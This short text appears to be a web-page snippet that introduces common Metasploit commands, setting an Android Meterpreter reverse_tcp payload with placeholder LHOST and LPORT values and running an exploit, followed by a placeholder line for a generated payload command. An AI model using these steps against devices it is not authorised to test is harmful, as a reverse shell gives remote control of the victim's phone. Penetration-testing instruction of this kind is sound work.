Learn how to use Metasploit with these common commands.
msfconsole
search exploit_name
use exploit/path
set payload android/meterpreter/reverse_tcp
set LHOST [your IP]
set LPORT [your Port]
exploit
Your payload command will appear here.